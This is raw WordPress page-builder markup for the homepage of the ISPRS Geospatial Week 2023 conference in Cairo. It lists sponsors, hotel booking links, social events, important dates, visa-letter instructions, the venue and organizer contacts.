css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" 